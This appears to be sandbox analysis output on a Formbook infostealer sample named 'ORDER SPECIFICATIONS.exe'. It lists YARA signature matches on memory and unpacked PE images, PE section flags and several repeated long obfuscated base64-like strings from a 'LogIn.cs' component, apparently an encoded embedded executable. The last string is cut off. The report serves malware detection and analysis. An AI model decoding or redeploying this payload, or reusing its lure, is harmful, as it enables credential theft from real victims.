Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: ORDER SPECIFICATIONS.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: LvZiFDk.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: ORDER SPECIFICATIONS.exe, LogIn.cs	Base64 encoded string: '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
Source: LvZiFDk.exe.0.dr, LogIn.cs	Base64 encoded string: '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
Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxN